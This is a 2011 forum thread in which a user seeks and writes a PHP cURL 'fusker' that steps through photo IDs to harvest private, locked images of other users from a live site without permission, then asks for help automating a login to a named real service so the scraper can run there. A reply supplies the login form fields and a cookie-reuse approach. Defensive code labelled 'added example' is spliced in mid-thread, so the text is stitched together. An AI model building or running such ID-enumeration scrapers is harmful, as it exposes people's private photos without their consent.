ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.


#1 2011-03-09 23:19:56

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Help with PHP fusking anyone?

Hello everyone!

I've been testing a website (just for fun) and found out about a possible vulnerability in the way it manages images uploaded by its users. I think I found a way to access private and locked images without needing the user's permission.

Right now, it's a real pain to access any of these images and there is no way of knowing whose picture you're accessing. But I think I can make a lot more sense of the accumulated data if I can grab a lot of pictures and analyze them with TinEye (http://www.tineye.com).

Can any one of you guys help me whip up something that can fusk the images from the website?

The format string of the URL is something like this:

http://<target site>/members/delete_photo.php?id=delete-photo&sbook_id=200050964

On accessing the page, it returns an image (as specified by the sbook_id number). Do you know how I could increment the sbook_id number sequentially, grab the image displayed for each number and dump them into some folder on my computer?

I read somewhere that a fusker can parse this:
http://<somesite.com>/images/image[000-100].jpg

and return all images ranging from image000, image001, etc. to image100.

But in my case, the images aren't stored sequentially; only the URL used to access them can be fusked. The images are stored with filenames that look like their MD5 hash.

Can you help me extract the images from the site by suggesting a method of fusking the URL and then reading the returned HTML for the <img src> tag and retrieving the images therein?


#2 2011-03-11 12:45:26

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Well, I've learned something new, never heard of fusking before.
It seems like a good programming project, you just need a simple script to access the URL and do a little parsing.
What programming language do you know?


#3 2011-03-13 23:44:37

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

I'm learning PHP at the moment and it's embarrassing, but the language I feel at home with is Visual Basic .NET.


#4 2011-03-13 23:49:54

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

kjangwa, if you found fusking interesting, you'll absolutely be blown away by TinEye. Check out the unbelievably scary yet supreme power of TinEye at www.tineye.com. It's an image search engine. :-)


#5 2011-03-15 15:07:19

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Yes I have already used both TinEye and GazoPa to aid me in solving challenges.
Nothing wrong with Visual Basic .NET.
I am also learning PHP and I think cURL is what you need, however I have never used it.
If you feel it will be helpful to you, I will have a go at making a simple script.


#6 2011-03-16 01:03:55

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

If you could write it, that'd be really helpful. I'm new to PHP and I looked around for some tutorials on cURL and wget to see if it could be solved using that. I'm convinced cURL can get the job done and I'm gonna try and make my own script, but I'm not really sure if I'll get it right.

If I do, I'll share it here for sure.


#7 2011-03-17 03:24:32

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Hi, I think I've successfully created an early version of my fusker script. Here's the code that the script will exploit:

Filename: test.php

<html>
<head>
<title>Target PHP Page</title>
</head>

<body>
<?php
	// Read the two query parameters; if either is missing, fall back to
	// the default picture (default00.jpg).
	$filenm = isset($_GET['file'])  ? $_GET['file']  : NULL;
	$index  = isset($_GET['index']) ? $_GET['index'] : NULL;
	if ($filenm == NULL || $index == NULL)
	{
		$filenm = "default";
		$index  = "00";
	}

	// The image path is simply FILENAME . INDEX . ".jpg" in the site root.
	$path = $filenm.$index.".jpg";
	echo "<center><tt>Filename: $path</tt><br><br>";
	echo "<img src=\"$path\"></center>";
?>
</body>
</html>


#8 2011-03-17 03:26:02

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Here's the code for my fusker script:

Filename: fusker.php

<html>
<head>
	<title>PHP Fusker *BETA</title>
</head>
<body>
<STYLE TYPE="text/css">
<!--
BODY
   {
   color:orange;
   background-color:black;
   font-family:sans-serif;
   }
A:link{color:blue}
A:visited{color:purple}
-->
</STYLE>
<?php
	echo "<h1><center>PHP Fusker <tt><small>*BETA</small></tt></center></h1>";

	// Fetch a URL with cURL; returns the cURL info array with the error
	// number, error message and page body added to it.
	// This function was retrieved from:
	// http://nadeausoftware.com/articles/2007/06/php_tip_how_get_web_page_using_curl
	// http://www.php.net/manual/en/function.curl-setopt-array.php#89850
	function get_web_page( $url )
	{
		$options = array(
			CURLOPT_RETURNTRANSFER => true,     // return web page
			CURLOPT_HEADER         => false,    // don't return headers
			CURLOPT_FOLLOWLOCATION => true,     // follow redirects
			CURLOPT_ENCODING       => "",       // handle all encodings
			CURLOPT_USERAGENT      => "spider", // who am i
			CURLOPT_AUTOREFERER    => true,     // set referer on redirect
			CURLOPT_CONNECTTIMEOUT => 120,      // timeout on connect
			CURLOPT_TIMEOUT        => 120,      // timeout on response
			CURLOPT_MAXREDIRS      => 10,       // stop after 10 redirects
		);

		$ch      = curl_init( $url );
		curl_setopt_array( $ch, $options );
		$content = curl_exec( $ch );
		$err     = curl_errno( $ch );
		$errmsg  = curl_error( $ch );
		$header  = curl_getinfo( $ch );
		curl_close( $ch );

		$header['errno']    = $err;
		$header['errmsg']   = $errmsg;
		$header['contents'] = $content;
		return $header;
	}

	echo "<br>";
	echo "<hr>";

	// Range of index numbers to fetch; defaults to 1-24.
	$startidx = isset($_GET['start']) ? $_GET['start'] : 1;
	$endidx   = isset($_GET['end'])   ? $_GET['end']   : 24;
	if ($endidx < $startidx) { $endidx = 24; }   // 'end' must not be below 'start'
	if ($startidx <= 0)      { $startidx = 1; }  // 'start' must be positive
	$imgnum = 1;

	for ($i = $startidx; $i <= $endidx; $i++, $imgnum++)
	{
		$page_info = get_web_page("http://localhost:82/test.php?file=Picture&index=$i");
		$html = $page_info['contents'];
		// The target emits a relative <img src>; prefix it with the target host
		// so the browser loads the picture from there.
		$html = str_replace("<img src=\"", "<img src=\"http://localhost:82/", $html);
		echo "<center><h2>Image Number: $imgnum</h2></center><hr>";
		echo $html;
		echo "<hr>";
	}
	echo "<center><tt>PHP Fusker *BETA</tt></center>";
?>
</body>
</html>


#9 2011-03-17 03:40:43

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

This is how it works (for anyone who's interested):

You need to setup a web server and configure a virtual host
so that it can host two sites at once
(it's very easy to do that using WAMP)
(more info here:
http://www.eggheadcafe.com/tutorials/aspnet/05de3a63-7a96-4e65-94d9-c090896290e8/creating-multiple-virtual-sites-on-a-wamp-server-installation.aspx)

The target site must run in "c:\wamp\www\target\test.php"

The fusker site is hosted at "c:\wamp\www\fusker.php"

After the virtual hosts are properly set up, typing http://localhost/fusker.php should show the PHP fusker page.

And typing http://localhost:82/test.php should show the target site (the one that's to be fusked).

Now the target page shows different images to the user using this format: http://localhost:82/test.php?file=FILENAME&index=INDEX_NUMBER

FILENAME will be concatenated with INDEX_NUMBER, the '.jpg' extension is appended to the result, and the file is loaded from the site's root dir. If the file doesn't exist, no image will be shown.

If either the FILENAME or the INDEX_NUMBER value is missing, a default picture (hardcoded as 'default00.jpg') will be shown.

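The target page above hands out any picture whose name can be guessed, which is exactly what makes it fuskable. As an added example (not the poster's code), here is a hardened counterpart to test.php that validates both parameters, checks that the requesting user is allowed to see the picture, and encodes what it echoes; the session user id and the owner map are assumptions standing in for the site's real login and photo database.

```php
<?php
// Added example: hardened counterpart to the test.php posted above (not the
// poster's code). Assumptions: $_SESSION['user_id'] holds the logged-in user
// and the owner map below stands in for the site's photo database.
session_start();

// Constructed sample data: filename => owner user id (null = public photo).
$photoOwners = array(
	'default00.jpg' => null,   // the fallback picture is public
	'Picture1.jpg'  => 7,
	'Picture2.jpg'  => 7,
	'Picture3.jpg'  => 9,
);

// Returns the filename the viewer may see, or null (deny) for anything else.
function resolvePhoto(array $get, $viewerId, array $owners)
{
	$file  = isset($get['file'])  ? $get['file']  : 'default';
	$index = isset($get['index']) ? $get['index'] : '00';

	// 1. Validate the inputs against a strict shape instead of concatenating
	//    them blindly: no path separators, quotes or other metacharacters.
	if (!preg_match('/^[A-Za-z]{1,32}$/', $file))  { return null; }
	if (!preg_match('/^[0-9]{1,6}$/', $index))     { return null; }
	$path = $file . $index . '.jpg';

	// 2. Authorize: an unknown filename, or one owned by somebody else, is
	//    denied, so stepping through index values yields nothing useful.
	if (!array_key_exists($path, $owners)) { return null; }
	$owner = $owners[$path];
	if ($owner !== null && $owner !== $viewerId) { return null; }
	return $path;
}

$viewer = isset($_SESSION['user_id']) ? (int) $_SESSION['user_id'] : null;
$path   = resolvePhoto($_GET, $viewer, $photoOwners);

if ($path === null) {
	// Same response for "missing" and "not yours", so the reply does not
	// reveal which index values exist; rate-limit repeated 403s at the server.
	header('HTTP/1.1 403 Forbidden');
	exit('Not available');
}

// 3. Encode on output: the name was validated, but encoding stays the rule so a
//    later relaxation of the pattern cannot turn into script injection.
$safe = htmlspecialchars($path, ENT_QUOTES, 'UTF-8');
echo "<tt>Filename: $safe</tt><br><br>";
echo "<img src=\"$safe\" alt=\"\">";
```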

#10 2011-03-17 03:51:44

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Here's how the fusker page works:

To fusk the target PHP page, visit http://localhost/fusker.php
(this automatically fusks images 1-24 from the target site. The names of the images are hardcoded as Picture1, Picture2, Picture3, etc. This can easily be changed)

A range of the pictures to be fusked can be specified by the 'start' and 'end' parameters in this way:

http://localhost/fusker.php?start=5&end=19

There is some basic error checking to see that 'end' is never less than 'start' and that 'start' is always a positive value or 0.

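The request pattern the fusker produces (one GET per index value, in order, from one client, a second or so apart) is also what a site operator can look for in the access log. An added example, not part of the thread: a PHP function over constructed common-log-format lines that flags a client requesting a run of consecutive index values against the same script, each within a short window of the previous one; the minimum run length and the window are assumptions.

```php
<?php
// Added example (not from the thread): detect sequential-index enumeration,
// the access pattern the fusker above produces, in web server access logs.
// Constructed sample log lines in common log format.
$logLines = array(
	'10.0.0.5 - - [17/Mar/2011:03:24:32 +0000] "GET /test.php?file=Picture&index=1 HTTP/1.1" 200 512',
	'10.0.0.5 - - [17/Mar/2011:03:24:33 +0000] "GET /test.php?file=Picture&index=2 HTTP/1.1" 200 512',
	'10.0.0.5 - - [17/Mar/2011:03:24:33 +0000] "GET /test.php?file=Picture&index=3 HTTP/1.1" 200 512',
	'10.0.0.5 - - [17/Mar/2011:03:24:34 +0000] "GET /test.php?file=Picture&index=4 HTTP/1.1" 200 512',
	'10.0.0.5 - - [17/Mar/2011:03:24:35 +0000] "GET /test.php?file=Picture&index=5 HTTP/1.1" 200 512',
	'10.0.0.9 - - [17/Mar/2011:03:25:01 +0000] "GET /test.php?file=Picture&index=12 HTTP/1.1" 200 512',
	'10.0.0.9 - - [17/Mar/2011:03:31:40 +0000] "GET /test.php?file=Picture&index=13 HTTP/1.1" 200 512',
);

// Returns "ip path" => longest run for every client that requested at least
// $minRun consecutive index values, each within $windowSec of the previous hit.
function findEnumeration(array $lines, $minRun = 4, $windowSec = 60)
{
	$byClient = array();
	foreach ($lines as $line) {
		// Pull out client IP, timestamp, script path and the numeric index parameter.
		if (!preg_match('#^(\S+) \S+ \S+ \[([^\]]+)\] "GET (/[^\s?]*)\?[^"]*\bindex=(\d+)#', $line, $m)) {
			continue;
		}
		$when = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
		if ($when === false) { continue; }
		$byClient[$m[1] . ' ' . $m[3]][] = array('t' => $when->getTimestamp(), 'idx' => (int) $m[4]);
	}

	$alerts = array();
	foreach ($byClient as $key => $hits) {
		$run = 1; $best = 1;
		for ($i = 1; $i < count($hits); $i++) {
			$consecutive = $hits[$i]['idx'] === $hits[$i - 1]['idx'] + 1;
			$close       = ($hits[$i]['t'] - $hits[$i - 1]['t']) <= $windowSec;
			$run  = ($consecutive && $close) ? $run + 1 : 1;
			$best = max($best, $run);
		}
		if ($best >= $minRun) { $alerts[$key] = $best; }
	}
	return $alerts;
}

// 10.0.0.5 /test.php is flagged with a run of 5; 10.0.0.9's two hits are
// consecutive but minutes apart, so it is not.
print_r(findEnumeration($logLines));
```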

#11 2011-03-17 04:03:04

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

I just noticed that the code I posted earlier has some formatting errors ("color<img src='/shout/shout/smilies/o.gif'>range" shows up where it should've been "color orange"), so I uploaded both the scripts online. You can check them out here:

test.php: http://pastebin.com/t3TkW83R
fusker.php: http://pastebin.com/Lj12D0iH

Fusking using this script might take a lot of time though.
If you need more efficiency and don't mind programming something yourself, you can use parallelcURL by Pete Warden
https://github.com/petewarden/ParallelCurl


#12 2011-03-20 09:00:49

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Nice work xyberz09.


#13 2011-03-21 05:02:48

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Thanks, kjangwa!!

The fusker works fine, but I have another problem now. To fusk the site, it must first log in to it, otherwise I can't access the files that I need to fusk. Now I found some info on logging on to sites using cURL online, but I haven't yet been successful in implementing it. Could you modify my script a little so that it can log in to:
http://www.mig33.com/sites/index.php

...before it begins fusking?

P.S. It's a bit confusing to implement a login script using cURL because this site uses a JS application to send user data to the site. I tried to figure out the actual POST data that's being sent using TamperData, but I couldn't make any sense of it. I see a username being passed on, but no password, just some SID value.


#14 2011-03-21 12:57:37

kjangwa
Member
Registered: 2010-03-27
Posts: 23

Re: Help with PHP fusking anyone?

Yeah, it looks like it uses an AJAX/JSON script to access an XML database, which then generates the SID.
I've not seen a login like that before.
Try the FF plugin HTTPheaders to see this info.

Also, using the FF plugin 'WebDeveloper toolbar' to 'view form information', you can see this:

Name:            Value:
------------     --------
session_user:    Username
session_p:       Password
rememberme:      on
login_invisible: on
submit:          Login

So I think you would have to set these 5 Name:Value pairs in your POST parameters.

What you could try is simply logging in with your web browser and getting your cookies.
Then put those cookies into your cURL script and access the pages you want with cURL.

Might be a good idea to make an adapted copy of your script and practice with it here on TiL;
both trying to log in, get the cookie, then access another page, and also getting a valid cookie first, then plugging that into your cURL script.


#15 2011-03-24 01:08:03

xyberz09
Member
Registered: 2009-06-10
Posts: 46

Re: Help with PHP fusking anyone?

Thanks. I'll try experimenting a bit and see what I can come up with. I'd like to fully automate the login process so I won't have to send my cookies manually. If I succeed, I'll post the edited script here. Thanks for your help!
